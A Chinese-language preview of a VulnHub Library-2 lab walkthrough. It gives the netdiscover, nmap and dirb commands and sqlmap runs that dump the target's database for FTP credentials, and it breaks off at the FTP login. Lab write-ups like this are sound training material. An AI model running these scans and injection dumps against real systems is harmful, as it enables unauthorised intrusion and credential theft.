vulnhub之Library-2的实践

文章预览

本周实践的是vulnhub的Library-2镜像， 下载地址，https://download.vulnhub.com/thelibrary/Library-2.7z， 用workstation导入成功， 做地址扫描，sudo netdiscover -r 192.168.220.0/24， 获取到靶机地址是192.168.220.128， 接着做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.220.128， 发现靶机有21端口的ftp服务，80端口的http服务， 对http服务做php路径暴破，dirb http://192.168.220.128 -X .php， 获取到http://192.168.220.128/library.php， 用burpsuite访问，在页面上随便点击个国家， 把访问请求改成POST方式，保存到req.txt文件， 尝试SQL注入暴破， sqlmap -r req.txt --dbs --batch --risk 3 --level 5， 获取到数据库library， 继续对数据库library进行暴破， sqlmap -r req.txt -D library --dump-all --batch --risk 3 --level 5， 获取到ftp服务的用户名密码，globus/AroundTheWorld， ftp登录靶机，ftp 192.168.220.128， 查看到当前是http服务主页面目录，而且 ………………………………